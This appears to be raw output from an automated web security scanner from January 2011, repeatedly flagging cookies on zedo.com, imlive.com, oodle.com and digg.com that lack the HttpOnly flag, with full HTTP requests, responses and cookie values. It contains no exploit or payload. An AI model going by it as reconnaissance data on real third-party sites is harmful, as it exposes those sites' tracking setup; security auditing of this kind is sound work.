GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 978 Content-Type: application/x-javascript Set-Cookie: FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=55 Expires: Fri, 28 Jan 2011 17:27:35 GMT Date: Fri, 28 Jan 2011 17:26:40 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/c5/jsc/fm.js HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 955 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "419234-82a5-4988a5a7ea280" X-Varnish: 1882666994 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=563 Expires: Fri, 28 Jan 2011 16:54:00 GMT Date: Fri, 28 Jan 2011 16:44:37 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 956 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=562 Expires: Fri, 28 Jan 2011 16:54:00 GMT Date: Fri, 28 Jan 2011 16:44:38 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/c5/jsc/fmr.js HTTP/1.1 Host: c7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFpb=1220:4f791'; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 979 Content-Type: application/x-javascript Set-Cookie: FFpb=1220:4f791';expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "86257539-809a-4988a5ada3000" X-Varnish: 1882667040 1882666656 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=257 Expires: Fri, 28 Jan 2011 17:30:57 GMT Date: Fri, 28 Jan 2011 17:26:40 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr-CA" lang="fr-CA" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: cafr.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: cbs6albany.oodle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2 Cache-Control: private P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM" Content-Type: text/html; charset=utf-8 Date: Sat, 29 Jan 2011 05:24:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: otu=4cb1554b3fac0f3130b9462891294fa6; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: ots=9071808584648e0860c7c6ca699e90c4; path=/; domain=.oodle.com Set-Cookie: a=dT1GNDQ0QTkwNTRENDNBNDg3; expires=Fri, 01-Jan-2038 20:00:00 GMT; path=/; domain=.oodle.com Set-Cookie: multivariate=YToyOntzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJjYnM2YWxiYW55IjtzOjEwOiJfdGltZXN0YW1wIjtpOjEyOTYyNzg2NjM7fQ%3D%3D; path=/; domain=.oodle.com Content-Length: 101595
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" > <head> <m ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:0,0|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,0;expires=Sun, 27 Feb 2011 17:26:43 GMT;path=/;domain=.zedo.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /OzoDB/cutils/R52_9/jsc/1302/egc.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFcat=1220,167,14:1220,101,9; ZFFAbh=749B826,20|1483_758#365; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 6 Content-Type: application/x-javascript Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:0,0|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,0;expires=Sun, 27 Feb 2011 17:26:43 GMT;path=/;domain=.zedo.com; P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" X-Varnish: 2848445226 Cache-Control: max-age=2330250 Expires: Thu, 24 Feb 2011 16:44:13 GMT Date: Fri, 28 Jan 2011 17:26:43 GMT Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021:0,0|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1:0,26,0;expires=Mon, 28 Feb 2011 05:25:30 GMT;path=/;domain=.zedo.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /OzoDB/cutils/R52_9/jsc/951/egc.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; aps=2; ZFFAbh=749B826,20|1483_759#365; FFad=32:15:42:23:13:18:2:1:1:0; ZCBC=1; ZEDOIDX=29; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:29,26,1:21,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; FFcat=826,187,14:951,11,14:826,187,9:951,7,9:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1; FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; __qca=P0-2130372027-1295906131971;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 6 Content-Type: application/x-javascript Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021:0,0|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:14,26,1:10,26,1:0,26,0;expires=Mon, 28 Feb 2011 05:25:30 GMT;path=/;domain=.zedo.com; P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" X-Varnish: 2884195688 Cache-Control: max-age=2286960 Expires: Thu, 24 Feb 2011 16:41:30 GMT Date: Sat, 29 Jan 2011 05:25:30 GMT Connection: close
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFpb=1220:4f791'$951:appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=826,187,9:951,2,9:826,187,14:951,7,14:951,11,14:951,7,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=20:10:11:4:5:9:0:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:6,26,1:1,26,1;expires=Sun, 27 Feb 2011 23:16:42 GMT;path=/;domain=.zedo.com;
FFgeo=5386156;expires=Sat, 28 Jan 2012 23:16:42 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFpb=1220:4f791'$951:spectrum728x90,burst728x90,appnexus300x250,realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=826,187,9:951,7,9:826,187,14:951,11,14:951,7,14:951,2,9:951,2,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFad=58:30:43:20:19:27:2:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:30,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1;expires=Mon, 28 Feb 2011 03:21:37 GMT;path=/;domain=.zedo.com;
FFgeo=5386156;expires=Sun, 29 Jan 2012 03:21:37 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
FFcat=826,187,14:951,7,14;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196647,196644:951,125046,131022,131021|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1;expires=Mon, 28 Feb 2011 13:39:46 GMT;path=/;domain=.zedo.com;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
FFgeo=5386156;expires=Sat, 28 Jan 2012 16:41:44 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
ZFFAbh=749B826,20|1483_759#365;expires=Sat, 28 Jan 2012 21:57:38 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
PI=h1037004Za883605Zc826000187,826000187Zs173Zt128;expires=Mon, 28 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: de.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="da-DK" lang="da-DK" d ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: dk.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:32:03 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2455 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 03:22:11 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2455 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:38 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2455 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:17 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2455 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
